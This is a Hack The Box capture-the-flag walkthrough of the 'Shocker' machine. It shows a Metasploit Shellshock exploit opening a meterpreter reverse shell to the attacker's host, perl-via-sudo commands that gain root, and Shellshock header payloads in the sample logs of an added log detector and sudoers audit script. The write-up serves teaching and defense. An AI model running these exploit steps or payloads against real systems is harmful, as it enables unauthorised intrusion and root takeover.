Shocker – Hack The Box

Machine: https://app.hackthebox.com/machines/Shocker

On to the next machine! Being lazy, I tried port 80 before running any scan:

Nice!

So let's bug it? We have the following software running on the server:

$ sudo nmap -sV -O shocker.htb
...
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)

An old Apache suggests looking for scripts under /cgi-bin; if one of them is served through a vulnerable bash, it may be exploitable with Shellshock.

After much (dir)busting, I found this:

$ curl http://shocker.htb/cgi-bin/user.sh
Content-Type: text/plain

Just an uptime test script

 08:49:56 up  1:21,  0 users,  load average: 0.06, 0.06, 0.01
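From the defender's side, the thing to notice about a CGI script like this one is that any request header bash sees as an environment variable can carry a Shellshock function definition. The following detector, an example added here and not part of the original write-up, parses Apache "combined" access-log lines and flags requests whose Referer or User-Agent carries the function-definition marker, rating hits against /cgi-bin/ as high severity. The log lines are constructed for the example; the marker regex and field names are my assumptions, not anything taken from the machine.

```python
import re

# Apache "combined" log format: client ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# The stable part of a Shellshock payload is the bash function-definition
# prefix "() {"; everything after it varies, so match only the prefix.
SHELLSHOCK_MARKER = re.compile(r'\(\)\s*\{')


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    parts = entry["request"].split()
    entry["path"] = parts[1] if len(parts) >= 2 else ""
    return entry


def is_cgi_request(entry):
    # Only requests that reach a CGI handler actually hand headers to bash.
    return entry["path"].startswith("/cgi-bin/")


def shellshock_hits(lines):
    """Return (client, path, header_field, severity) for every line whose
    Referer or User-Agent contains the function-definition marker.
    Hits on /cgi-bin/ paths are "high"; elsewhere they are "low" (probing)."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        for field in ("referer", "agent"):
            if SHELLSHOCK_MARKER.search(entry[field]):
                severity = "high" if is_cgi_request(entry) else "low"
                hits.append((entry["client"], entry["path"], field, severity))
                break
    return hits


# Constructed sample log lines: one normal curl, one marker in the User-Agent
# against the CGI script, one marker in the Referer against a static page,
# and one unrelated browser request.
SAMPLE_LOG = [
    '10.10.14.4 - - [09/Jan/2023:08:49:56 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 95 "-" "curl/7.85.0"',
    '10.10.14.4 - - [09/Jan/2023:08:58:40 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 0 "-" "() { :; }; echo probe"',
    '10.10.14.4 - - [09/Jan/2023:08:58:41 -0500] "GET /index.html HTTP/1.1" 200 137 "() { :; }; echo probe" "Mozilla/5.0"',
    '10.10.14.9 - - [09/Jan/2023:09:01:02 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 95 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    for hit in shellshock_hits(SAMPLE_LOG):
        print("%-12s %-20s in %-8s severity=%s" % hit)
```

The default combined format records only two of the headers that reach the CGI environment, so this is a lower bound: a payload in Cookie or a custom header is invisible unless you log those fields too. The real fix is patching bash; the log check is for finding out whether anyone tried.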

Then I used Metasploit with the following options (truncated default values from the paste) and got an initial foothold as a user:

msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > options

Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):

   Name       Current Setting   Required  Description
   ----       ---------------   --------  -----------
   RHOSTS     shocker.htb       yes       The target host(s)
   RPORT      80                yes       The target port (TCP)
   TARGETURI  /cgi-bin/user.sh  yes       Path to CGI script

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.4       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Linux x86_64

View the full module info with the info, or info -d command.

msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run

[*] Started reverse TCP handler on 10.10.14.4:4444 
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (1017704 bytes) to 10.10.10.56
[*] Meterpreter session 1 opened (10.10.14.4:4444 -> 10.10.10.56:40898) at 2023-01-09 08:58:46 -0500

meterpreter > getuid
Server username: shelly

And we have the user flag:

meterpreter > cat /home/shelly/user.txt
aada***********************************

Getting root doesn't seem to be much more complicated. We can run perl through sudo as root without a password:

meterpreter > shell
Process 3852 created.
Channel 4 created.
python3 -c 'import pty;pty.spawn("/bin/bash")'
shelly@Shocker:~$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
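A rule like that is the classic sudoers mistake: granting an interpreter is the same as granting a root shell, with or without NOPASSWD. The audit helper below is an example added here, not code from the write-up; it parses the "may run the following commands" block of `sudo -l` output and flags rules that hand root an interpreter or an unrestricted `ALL`. The SHELL_CAPABLE list is an illustrative assumption to extend for your own estate, and the second sample rule is constructed to show a benign entry passing.

```python
import os
import re

# Binaries that execute arbitrary commands when run as root. Illustrative
# assumption, not an exhaustive list.
SHELL_CAPABLE = {
    "perl", "python", "python2", "python3", "ruby", "bash", "sh", "dash", "zsh",
    "vi", "vim", "less", "more", "awk", "find", "env",
}

# "(runas) TAG: TAG: command, command"  as printed by `sudo -l`
SUDO_L_RE = re.compile(
    r'^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<commands>.+)$'
)


def parse_sudo_l(text):
    """Return (runas, nopasswd, command) tuples from `sudo -l` output.
    Only lines after the 'may run the following commands' header count."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = SUDO_L_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in m.group("commands").split(","):
            rules.append((m.group("runas").strip(), nopasswd, cmd.strip()))
    return rules


def risky_rules(rules):
    """Flag rules that give root (or ALL) an interpreter or an unrestricted ALL."""
    findings = []
    for runas, nopasswd, cmd in rules:
        if cmd == "ALL":
            findings.append((runas, nopasswd, cmd, "unrestricted"))
            continue
        binary = os.path.basename(cmd.split()[0])
        runas_user = runas.split(":")[0].strip()
        if binary in SHELL_CAPABLE and runas_user in ("root", "ALL"):
            findings.append((runas, nopasswd, cmd, "interpreter"))
    return findings


# The first rule is the one from the machine; the second is constructed
# to show a narrowly scoped command that should not be flagged.
SAMPLE_SUDO_L = """Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/systemctl restart apache2
"""

if __name__ == "__main__":
    for runas, nopasswd, cmd, why in risky_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print("%s: (%s) %s%s" % (why, runas, "NOPASSWD: " if nopasswd else "", cmd))
```

The remediation is to grant the one script that actually needs root (ideally by full path, with no arguments the caller can vary) rather than the interpreter that runs it; `sudo -l` output from each host is cheap to collect, and feeding it through a check like this catches the perl case before a player, or an attacker, does.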

So we g3t r00t and find the flag:

$ echo "system('whoami');" | sudo /usr/bin/perl
root

$ echo "system('cat /root/root.txt');" | sudo /usr/bin/perl
ff97****************************

What did we learn from this machine?

If the server looks empty, keep enumerating the URL. Look for the specific file types one would expect in directories like cgi-bin: don't look for .php files there, but rather .cgi or .sh.